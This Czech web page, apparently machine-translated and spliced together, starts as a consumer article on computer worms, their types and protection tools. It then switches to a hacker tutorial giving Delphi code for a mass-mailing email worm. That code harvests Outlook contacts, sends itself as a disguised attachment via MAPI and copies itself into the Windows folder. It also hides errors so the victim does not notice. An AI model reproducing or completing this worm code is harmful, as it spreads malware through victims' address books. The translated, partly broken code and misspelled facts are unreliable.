Internetové červy viry. Co jsou to počítačoví červi? Podívejte se, co je to „počítačový červ“ v jiných slovnících

Počítačové viry, malware – to vše je pro operační systém destruktivní. Co dělat? Jak porazit nenáviděné virové programy? Začínající uživatelé si řeknou, že stačí nainstalovat antivirus. Ale není to tak jednoduché. Koneckonců, abyste porazili virus, musíte vědět, ke kterému typu patří.

Jedním z nejběžnějších malwarů je červ virus. Jak ochránit váš počítač před průnikem tohoto nezvaného hosta a co to vlastně je?

Co je to „červ virus“?

Existuje obrovské množství typů škodlivého počítačového softwaru. Jedním z těch virů, kterých je po infekci poměrně problematické se zbavit, je virus „síťového červa“. Jedná se o samostatně se replikující počítačový program, který proniká do lokálních i globálních sítí. Podstatný rozdíl mezi běžným virem a tímto škodlivým programem je přitom v tom, že druhý je zcela nezávislý.

Typy síťových červů

Počítačové viry jsou rozděleny do tří kategorií, které se výrazně liší svými vlastnostmi a poškozením, které zařízení způsobují.

  • První kategorií jsou e-mailoví červi. Obvykle jsou distribuovány v jednom souboru prostřednictvím e-mailu. Uživatel obdrží dopis od neznámého příjemce s přílohou. Přirozeně, podlehl zvědavosti, sám otevře přílohu, která již obsahuje síťového červa, po kterém dojde k infekci.
  • Druhou kategorií, která je mezi malwarem nejčastější, jsou červi rezidentní v RAM. Tento virus neinfikuje pevné disky, ale vkládá se do paměti RAM, čímž poškozuje běžící programy. Aby se takový červí virus „vrátil domů“, stačí restartovat počítač.
  • Třetí a nejnebezpečnější kategorií jsou červi, kteří ukládají kód na pevný disk zařízení. Nejčastěji se používají ke způsobení nějakého poškození informací, například k provedení DoS útoku. A zde restartování počítače problém nevyřeší. Zde pomohou pouze kvalitní antivirové systémy a i to ne všechny. S ošetřováním infikovaného disku byste měli začít co nejdříve, jinak se budete muset rozloučit s celým operačním systémem.

Jak a za jakým účelem se síťoví červi šíří?

Takové viry šíří hackeři, aby dosáhli různých cílů. Některé programy jsou navrženy tak, aby zachytily kontrolu nad zařízením. Sám uživatel si přitom nikdy nevšimne, co virus červa dělá. Jiní používají infikovaný počítač jako způsob šíření viru všemi dostupnými sítěmi, místními i globálními.

Hackeři přišli s mnoha různými způsoby šíření červa. Nejčastěji se vyskytuje virus, který si uživatel musí zpočátku na svém počítači spustit sám. Může to být elektronická příloha nebo nějaký miniprogram stažený z internetu. Existují však i tací, kteří k infikování zařízení nepotřebují zásah někoho jiného;

Jak se chránit?

Abyste zabránili napadení počítače virem, musíte vědět o ochranných opatřeních. Mnozí si řeknou, že bude stačit jakýkoli antivirový program, protože viry při vstupu do systému okamžitě zablokuje. Ve skutečnosti to není pravda. Antivirový program nebude schopen zabránit včasnému vstupu červa do zařízení, protože pouze varuje, že je na konkrétním webu zjištěn škodlivý program. Většina uživatelů tomu nepřikládá žádný význam spuštěním nebo stažením infikovaného souboru do svého počítače.

Vynikající možností ochrany před tímto typem softwaru je proaktivní technologie. Na rozdíl od běžných antivirových programů tato technologie spíše zabrání infekci systému než hledání již známých virů na pevných discích. V tomto případě bude virus zablokován pouze v případě, že představuje skutečnou hrozbu pro OS.

Síťový červ: jak odstranit virus?

Pokud se malware dostane do vašeho počítače, musíte jej okamžitě odstranit. Jak ale odstranit virus bez poškození operačního systému? V takové situaci přijdou na pomoc nezkušeným uživatelům antiviry. Naštěstí jejich instalace nezabere mnoho času.

  • Záchranný disk Kaspersky- program, který umožňuje pomocí správy systému vyčistit pevné disky od virů. Chcete-li začít pracovat s programem, musíte vypálit spouštěcí disk pomocí obrazu ISO. A pak už jen přes něj spustit operační systém v BIOSu.
  • Nástroj Kaspersky Virus Removal Tool vhodnější pro začínající uživatele a ty, kteří ještě nepochopili složitosti systému. Vyhledá malware ve vašem počítači a odstraní jej ze systému. Nedokáže si však poradit se všemi typy virů.

  • Dr.Web CureIt může dobře nahradit předchozí antivirový program. Jeho obrovskou nevýhodou je, že skenování pevných disků trvá velmi dlouho. Někdy to může trvat asi deset hodin. Tak dlouhé skenování je samozřejmě známkou toho, že program pečlivě kontroluje každý soubor. Není však mnoho lidí ochotných strávit celý den hledáním jednoho viru.

Preventivní opatření

Chcete-li se chránit před útoky hackerů prostřednictvím virů, není nutné do počítače instalovat spoustu speciálních bezpečnostních programů. Stačí dodržovat opatření na síti, pak se do zařízení nedostane jediný škodlivý soubor.

  • Pokud obdržíte e-mailem důležitou zprávu s přílohou, nespěchejte s jejím otevřením. Nejprve je třeba uložit přílohu na disk a poté ji spustit pomocí libovolného prohlížeče. Možná, že místo textového dokumentu nebo fotografie byl do počítače přijat spustitelný soubor.
  • Za žádných okolností nespouštějte žádný program, který byl přijat e-mailem z neznámé adresy. S největší pravděpodobností do zařízení přišel hackerský soubor.
  • I když příloha pochází z již známého e-mailu, neměli byste s jejím otevřením spěchat. Nejprve jej musíte naskenovat antivirem. Je možné, že e-mailová adresa, ze které dopis přišel, je již napadena malwarem a nyní jednoduše rozesílá newsletter všem uloženým kontaktům.
  • Známkou toho, že odeslaná příloha bude obsahovat virus, může být nějaká senzační zpráva ve zprávě. To je prostě návnada, která má uživatele zaujmout obsahem a ze zvědavosti infikovaný soubor otevřít.

Červ je v některých ohledech podobný počítačovým virům. Tento program je také schopen opakované reprodukce v paměti PC, ale ne vždy je schopen narušit výkon zařízení. Červ působí tajně a není tak snadné ho odhalit. Jsou cítit, když některé programy nebo samotný operační systém začnou zamrzat. Červ přitom využívá všechny dostupné prostředky PC včetně softwaru.

Červ se obvykle dostane do paměti počítače jako jediná aplikace. Na rozdíl od virů není tento program připojen k jednotlivým aplikacím. Nejčastěji můžete červa chytit přes internet.

Nejznámějšími viry jsou červi.

Typickým příkladem je "Čtení kódu". Jedná se o jednoduchého internetového červa, který infikuje počítače se softwarem společnosti Microsoft. Tento konkrétní červ již dokázal infikovat více než 6 milionů serverů po celém světě. Jakmile je Code Read v paměti, může zahájit útok na konkrétní počítač v síti pomocí jeho jedinečné IP adresy. O něco později se objevili noví zástupci programů červího oddílu - Code Reed II. Jedná se o agresivnějšího bratra, který si zachovává podobné slabiny a principy jednání. Jeho jádro obsahuje trojského koně schopného zcela ovládnout operační systém. (Můžete si přečíst více o Trojanovi) Nelze nezmínit NIMDA. Kód této aplikace je kombinací trojského koně a běžného červa. Je známo, že se rychle množí a už zkazil náladu více než 8 milionům správců sítí.

Jak chránit počítač před virem?

Existuje několik jednoduchých pravidel, jejichž dodržování zaručuje bezpečnost operačního systému:

  • Pokud si nejste jisti spolehlivostí portálu, projděte.
  • používat méně nelicencovaných programů.
  • Neměli byste zadávat systémové příkazy pod diktátem neznámého „asistenta“.

Pamatujte, že žádný antivirus neposkytuje 100% ochranu.

Existuje mnohem více způsobů, jak se chránit před viry, jsou zde popsány pouze ty nejjednodušší a nejúčinnější. Aby se virus nedostal do vašeho PC, doporučuje se nainstalovat antivirus a častěji aktualizovat virovou databázi.

Moderní červ se může vyvíjet a být mazanější, takže se nelze spoléhat pouze na antivirus. Postupem času se viry stávají silnějšími, ale nelze je detekovat.

Jiné způsoby ochrany.

Windows má vestavěný ochranný systém – firewall, který dokáže bránit virtuálním červům. Odborníci navíc doporučují používat raději osvědčené programy, než vše stahovat. Klasické viry lze zneškodnit pomocí Firewall Plus – jednoduché aplikace zaměřené na boj s trojskými koňmi, keyloggery a dalšími zlými duchy. Pamatujte, že World Wide Web je oblíbeným místem pro červy, takže Neotevírejte e-maily od neznámých osob s připojenými soubory.

Konečně.

Další důležitý tip. Škodlivý kód je navržen tak, aby poškodil soubory a osobní data. Proto, Vždy by měla existovat záložní kopie dat na samostatném médiu. Je třeba si uvědomit, že většina červů vstupuje do PC prostřednictvím archivů s bezplatnými aplikacemi. A pamatujte, že spam může přinést i nezvaného hosta v podobě emailu se ZIP archivem.

Typy červů se liší podle následujících vlastností: způsobem šíření červa - jak přenáší kopii na vzdálené počítače, způsobem spuštění kopie červa na infikovaném počítači, způsobem zavedení do systému navíc takovými vlastnostmi, jako je polyforismus, stealth a další typy škodlivého softwaru (viry, trojské koně).

O emailových červech - Email-Worm

Tato kategorie červů se vyznačuje tím, že k šíření využívají email. Červ funguje následovně: odešle svou kopii jako přílohu e-mailu nebo pošle odkaz na svůj soubor umístěný na jednom ze síťových zdrojů, například adresu URL infikovaného souboru umístěného na napadené nebo hackerské webové stránce. V důsledku toho se při otevření infikované přílohy nebo odkazu na infikovaný soubor aktivuje kód červa.

Nejběžnější způsoby, jak poštovní červi odesílají infikované zprávy, jsou:

  • používání služeb MS Outlook;
  • prostřednictvím funkcí Windows MAPI;
  • prostřednictvím přímého připojení k serveru SMTP pomocí poštovní knihovny zabudované do kódu červa.

Metody používané e-mailovými červy k nalezení e-mailových adres pro odesílání infikovaných e-mailů:

  • mohou se posílat na všechny adresy nalezené v adresáři MS Outlook a na adresy nalezené v poštovní schránce a někteří poštovní červi mohou dokonce „odpovídat“ na dopisy nalezené ve schránce;
  • skenují soubory, které mají k dispozici na disku, a zvýrazní v nich řádky, které jsou identifikovány jako e-mailové adresy.

Červi v podstatě používají několik výše uvedených metod najednou. Existují i ​​jiné způsoby, jak najít „elektronické“ adresy.

Červi, kteří používají internetové posly - IM-Worm

Červi tohoto typu používají jedinou metodu šíření: posílají se detekovaným kontaktům se zprávami v seznamu kontaktů tyto kontakty obsahují URL na soubor umístěný na jednom z webových serverů. Tato technika je téměř totožná se stejnou metodou distribuce, kterou používají poštovní červi.

IRC-Worm - červi v IRC kanálech

Stejně jako e-mailoví červi má tento typ červa dvě metody šíření prostřednictvím IRC kanálů.

Druhý způsob: odeslání infikovaného souboru nešťastnému uživateli. Napadený uživatel musí v pravý čas potvrdit přijetí tohoto souboru, poté jej uložit na disk a otevřít (spustit).

Net-Worm - další síťoví červi

První metoda se vyznačuje tím, že se červ snaží najít vzdálené počítače, poté, co jej nalezne, se zkopíruje do adresářů, které jsou otevřené pro čtení a zápis, pokud existují. Červi tohoto typu mohou jednoduše procházet dostupné síťové adresáře pomocí funkcí operačního systému. Nebo budou takoví červi náhodně vyhledávat počítače v globální síti a po připojení k počítačům se pokusí otevřít jejich disky pro plný přístup.

Druhá metoda je možná, pokud jsou v počítačovém softwaru kritická zranitelnosti. Tyto červy vyhledávají takové počítače a odesílají speciálně navržený síťový paket nebo požadavek (využití zranitelnosti), čímž kód červa pronikne do počítače. Pokud síťový paket obsahuje pouze část kódu červa, po průniku si stáhne hlavní soubor a spustí jej ke spuštění.

Samostatnou kategorii tvoří červi, kteří ke své distribuci využívají webové a FTP servery. Proces infekce lze rozdělit do dvou fází: v první fázi červ pronikne na počítačový server a určitým způsobem modifikuje soubory služeb serveru (jako příklad lze uvést statistické webové stránky). Poté čeká na návštěvníky, kteří si chtějí vyžádat informace z tohoto infikovaného serveru, a proniká tak na další počítače v síti.

Počítačoví červi v zásadě používají více než jednu metodu šíření svých kopií po sítích (mohou mít dvě nebo více metod útoku na vzdálené počítače).

Červi pro sítě pro sdílení souborů - P2P-Worm

K infiltraci do P2P sítě se takový červ zkopíruje do adresáře pro sdílení souborů, který se obvykle nachází na místním počítači. Vše ostatní se v jistém smyslu stane samo, protože P2P síť se ujme práce s šířením viru – prohledáním sítě bude o tomto souboru informovat vzdálené uživatele a poskytne vše potřebné ke stažení souboru z infikovaný počítač.

Existují i ​​složitější P2P červi, kteří dokážou napodobit síťový protokol reálného systému pro sdílení souborů a pozitivně reagovat na vyhledávací dotazy, v tomto případě červ nabízí kopii sebe sama ke stažení.

Hlavním způsobem, jakým se červi od sebe liší, je způsob, jakým se červ šíří. Dalšími znaky rozdílu jsou způsoby spuštění kopie červa na infikovaném počítači, způsoby zavedení do systému, stejně jako polymorfismus, utajení a další vlastnosti, které jsou vlastní jiným typům škodlivého softwaru (viry a trojské koně).

Druhy červů

V závislosti na způsobu, jakým pronikají do operačního systému, se červi dělí na:

  • Poštovní červi(Mail-Worm) - červi, kteří se šíří ve formátu e-mailových zpráv. V tomto případě červ odešle buď svou kopii jako přílohu e-mailu, nebo odkaz na svůj soubor umístěný na nějakém síťovém zdroji (například adresu URL infikovaného souboru umístěného na napadené nebo hackerské webové stránce). V prvním případě se kód červa aktivuje při otevření (spuštění) infikované přílohy, ve druhém - při otevření odkazu na infikovaný soubor. V obou případech je efekt stejný – aktivuje se kód červa.
  • IM červi(IM-Worm) - červi, kteří používají internetové messengery. Známí počítačoví červi tohoto typu používají jedinou metodu šíření - zasílání zpráv detekovaným kontaktům (ze seznamu kontaktů) obsahujících URL na soubor umístěný na nějakém webovém serveru. Tato technika téměř úplně kopíruje podobnou poštovní metodu používanou poštovními červy.
  • P2P červy(P2P-Worm) – červi, kteří se šíří pomocí peer-to-peer sítí pro sdílení souborů. Operační mechanismus většiny těchto červů je poměrně jednoduchý – k infiltraci do P2P sítě se červ potřebuje pouze zkopírovat do adresáře pro sdílení souborů, který je obvykle umístěn na místním počítači. O veškerou zbývající práci na šíření viru se stará P2P síť – při vyhledávání souborů v síti bude o tomto souboru informovat vzdálené uživatele a poskytne všechny potřebné služby pro stažení souboru z infikovaného počítače. Existují složitější P2P červi, kteří napodobují síťový protokol konkrétního systému pro sdílení souborů a kladně reagují na požadavky na vyhledávání – přičemž červ nabízí kopii sebe sama ke stažení.
  • Červi v IRC kanálech(IRC-Worm). Tento typ červa, stejně jako e-mailoví červi, má dva způsoby šíření červa prostřednictvím IRC kanálů, přičemž se opakují výše popsané metody. První zahrnuje odeslání adresy URL na kopii červa. Druhý způsob je poslat infikovaný soubor nějakému uživateli sítě. V tomto případě musí napadený uživatel potvrdit přijetí souboru, poté jej uložit na disk a otevřít (spustit pro spuštění).
  • Síťoví červi(Net-Worm) - další síťoví červi, mezi kterými má smysl dodatečně rozlišovat internetové červy a LAN červy
    • Internetoví červi- červi, kteří k šíření využívají internetové protokoly. Většinou se tento typ červa šíří pomocí nesprávného zpracování základních paketů zásobníku protokolu TCP/IP některými aplikacemi.
    • LAN červi- červi šířící se prostřednictvím lokálních síťových protokolů

Dnes vám popíšu princip fungování síťového viru. Téma, jak jste pochopili, je velmi relevantní, protože 70 % mé osobní schránky je vždy plné virů všeho druhu
- od malých, ale zlých VBS červů až po jeden a půl megagramová díla mladších školáků :) Nevědí o existenci WinAPI :)

K proniknutí do počítače mohou viry použít buď chyby v uživatelském softwaru (VBS+Outlook=láska:)), nebo chyby v hlavě uživatele. Podívejme se na příklad takového virálního dopisu:

Subj: Legrační
Ahoj! Zachovejte ten skvělý vtip, který jsem vám slíbil (nebo ne, nevzpomínám si :)). Ale stejně si to nech. Nebojte se, ve skutečnosti nic neformátuje!
Nezapomeň se podívat, paranoik :)
Hodně štěstí!
Připojit: fake_format.exe

No, tady to je: každý chromý uživatel internetu neustále posílá vtipy svým přátelům, a proto si ve skutečnosti nepamatuje, komu co slíbil; zpráva o „falešném formátování“ přepne mozek oběti na vtipy a slepou víru v antiviry
- končí 🙂 Připomínám, že algoritmy, které jsem popsal, nejsou určeny žádnými webovými, avp a jinými bojovníky.

Zkrátka už jsem chtěl tento vtipný vtip začít sám. Spouštím to :)

Chyba... intel pentium 5 nenalezeno!

Oh... Zdá se, že to nefunguje? Ne, nehádal jsem 🙂 Ve skutečnosti virus okamžitě přenesl své tělo na pevný disk oběti, zaregistroval se ke spuštění a nyní bude viset v paměti RAM (nápověda: v lékařském žargonu je „RAM“ OPERATIVNÍ CHIRURGIE, tak pozor;)) oběti podle mnou popsaného principu v článku “Do-It-Yourself Resident Virus”. Jen to nebude kontrolovat spouštění souborů, ale připojení k internetu 🙂 (ve zdrojovém kódu to bude postup IsOnline, takže do budoucna;)). Nicméně zároveň
nikdo vám nebrání ve sledování spouštění souborů
- je to stále virus, i když je to síťový virus. Proto do logiky zařadím proceduru InfectFile. Použijeme tedy následující funkce a postupy:

ISONLINE - kontrola připojení k internetu
SENDVIRUS - hádejte třikrát 😉
GETMAILS - získejte adresy z Outglitch's AddressesBook
INFECTFILES - 🙂
WORKMEMORY - téměř stejné jako v předchozím článku, ale s úpravami.

KÓDOVÁNÍ

Než začne samotné kódování, bude tentokrát potřeba hodně předběžných pohlazení :) Vysvětlím proč: pro čtení adresáře přistoupíme k Outlooku přes meziprogramové rozhraní a k tomu není špatné použít jeho knihovna typů. Tak udělejte: knihovnu typů importu projektu a podívejte se tam... je to tak, Outlook Express v.9 nebo co máte. Za devátou verzi se považuje, pokud se nepletu, od Office2k. Dovezeno? Co znamená „není na seznamu“? Dobře, to se stává. Hledat ručně
- v adresáři s kanceláří je soubor msoutl.olb. To je ono 😉 Teď do sekce použití napište outlook_tlb a budete mít přístup k nejintimnějším místům ve vašem adresáři 🙂 Ach, dnes jsem nějak zaujatý 😉
Obecně by měl postup vykuchání adresáře vypadat takto:

používá
ComObj, outlook_tlb,
Formuláře;
....
Postup ZÍSKEJTE POŠTY;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s:string;
num, i: celé číslo;
mails: pole řetězců;

začít
MSOutlook:= CreateOleObject("Outlook.Application");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength(maily,MyFilder.Items.Count);
for i:= 1 do MyFolder.Items.Count do
začít
MyItem:= MyFolder.Items[i];
mails[i]:= myitem.email1addres;
konec;

Tak co, líbilo se ti, co jsem napsal? Jejda, bude to jen horší. Protože virus bude odeslán pomocí čistého API. A to, jak říká Horrific: „stejný jako při manuálním sexu, efekt je v obou případech, ale jeho dosažení trvá dlouho a není tam takový šum“ :) No
tak co jsem sem napsal? Používá Comobj nám umožňuje pracovat s technologií COM; Pak už jen vytvoříme OLE Outlook objekt a cyklicky z něj zjišťujeme seznam emailů. Pokud chcete zjistit ještě něco
- to je také skutečné, přečtěte si dokumenty - vládnou. Dokonce i v angličtině. Seznam e-mailů se zapisuje do dynamického pole řetězců. Bude používán funkcí SendVirus. Toto:

function SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i:integer;
s:string;
začít
s MapiRecipDesc ​​začněte
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= nula;
konec;

s MapiFileDesc začněte
ulReserved:= 0;
flFlags:= 0;
nPozice:= 0;
lpszPathName:= PChar(Příloha);
lpszFileName:= nil;
lpFileType:= nula;
konec;

s MapiMessage začněte
ulReserved:= 0;
lpszPředmět:= nula;
lpszNoteText:= PChar(Předmět);
lpszMessageType:= nula;
lpszDateReceived:= nil;
lpszConversationID:= nula;
flFlags:= 0;
lpOriginator:= nula;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
pokud délka (Příloha) > 0, pak začněte
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
konec jinak začátek
nFileCount:= 0;
lpFiles:= nula;
konec;
konec;

Výsledek:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
nebo MAPI_LOGON_UI nebo MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
konec;

Otekl jsi při čtení? Jděte si dát pivo, jinak nic nepochopíte.
Pil jsi? Já taky 😉 Dobře, pokračujeme. Budete to používat takto:

Pro i:= 1 to length (maily) do
začít
SendVirus("",maily[i],"pricol".");
konec;

Zde budeme používat použití MAPI, takže to nezapomeňte deklarovat. Zkrátka tohle
- nízkoúrovňová práce s poštou. A abyste mohli pracovat s poštou, jak víte, musíte mít a)
email příjemce b) text dopisu c) příloha. Tohle je to co dělám:
MapiRecipDesc ​​​​- popište příjemce, MapiFileDesc - příloha,
těch. náš virus, MapiMessage je zpráva, pak ji pošlu do velkého světa příkazem MapiSendMail 😉 No, ukázalo se, že to není tak těžké. Hlavní věc je pochopit, že je to váš největší přítel
- to není c:\porno, ale win32.hlp :)

Jak můžeme nyní vměstnat všechnu tuto mnohomluvnost do drsné logiky viru? Přijdete na to sami, vyprávím vám o tom 2 články za sebou. A každopádně jsem včera oslavil narozeniny své přítelkyně a teď mi trochu třeští hlava :) No dobře, smysl pro povinnost je silnější. Prostě to udělej:
První řádek slouží ke kontrole názvu souboru, ze kterého jste začali. Li
pricol.exe znamená CopyFile to Windows :) A pokud jsi začínal z adresáře Windows
- poté cyklicky kontrolujte své připojení k celosvětové síti 😉. Kontrolujeme:

funkce IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
začít
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Result:= (Res = 0) and (dwCount > 0);
konec;

Tak. Pokud je vše v pořádku, pokračujte - protřepejte adresář a odešlete poštu. Jsou zde dva triky. Pokud vaše jméno
pricol.exe - okamžitě zkontrolujte připojení. Uživatel může kontrolovat e-mail online. Tím se výrazně zvýší naše šance na získání newsletteru. Na druhý trik jsi už přišel sám,
totiž ve scénáři, který jsem popsal, budete vždy posílat stejné dopisy stejnému uživateli, jen proto, že nebyl vymazán z adresáře. Proto si všechny zpracované adresy zapisujte do log souboru a neustále jej kontrolujte. Zdá se, že je to ono. I když ne. Nezapomeňte do pokusu přiložit fragmenty kódu náchylné k chybám..s výjimkou. A vložte klíč ($D-). Protože pokud uživatel náhle zachytí chybu, jako že „FUCK“ není platná celočíselná hodnota, bude něco tušit.

ZÁVĚR

Tento poslední článek je o virech laděných pro Windows 9x. Nedávno jsem naformátoval šroub a nainstaloval WindowsXP Professional, takže následující příklady budou pro něj. A už si pomalu můžete kupovat Delphi 7, když jsem někde zasela svoje šestky a teď sedím úplně nahá :) Podle toho si koupím sedmičky 😉

Další článek bude pravděpodobně věnován steganografii a její praktické realizaci.